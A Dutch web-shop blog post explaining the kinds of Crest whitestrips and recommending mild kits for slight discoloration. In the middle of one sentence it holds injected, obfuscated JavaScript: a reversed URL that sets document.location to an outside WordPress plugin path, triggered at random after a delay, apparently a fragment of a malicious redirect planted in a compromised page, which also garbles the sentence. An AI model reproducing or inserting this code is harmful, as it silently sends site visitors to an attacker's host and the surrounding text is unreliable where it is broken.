Welke crest whitestrips moet ik kiezen?

Crest 3D white heeft verschillende soorten whitestrips in hun assortiment. Wij bieden alle originele crest producten aan in onze webwinkel. Deze kan je super veilig bestellen door direct naar de winkel te gaan. Weet je al welke strips je nodig heb lees dan niet verder maar bestel direct de strips die jij nodig hebt in de winkel.

Crest whitestrips zijn er in verschillende soorten deze dienen ook elk voor dat specifieke doel gebruikt te worden. Het is niet de bedoeling dat de One-Hour Express gebruikt worden als een Supreme FlexFit. Dan kan namelijk schade toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toebrengen aan je gebit. Volg voor elk bestelde product de bijgevoegde gebruiksaanwijzing.

De crest producten kan je ondervedelen in drie verschillende categorieën. Deze lopen op qua sterkte van de kuur. Probeer tijdens het bestellen rekening te houden met welke kuur je neemt voor je tanden. Als je tanden niet zo geel zijn en wil je een beginnende geelheid aanpakken, dan kan je het beste kiezen voor een milde kuur. Deze zijn er verschillende varianten. Je kan dan kiezen voor een Classic Vivid of een Gentle Routine. Dit zijn de mildste kuren die wij aanbieden, met deze kuur zal de kans op gevoelige tanden nihil zijn. Mocht je hier bang voor zijn kan je het beste beginnen met een van deze kuren. In de aankomende artikelen zullen we meer behandelingen bespreken en welke je voor een wat heftigere geelheid het beste kan gebruiken. Houdt de blog in de gaten voor meer info.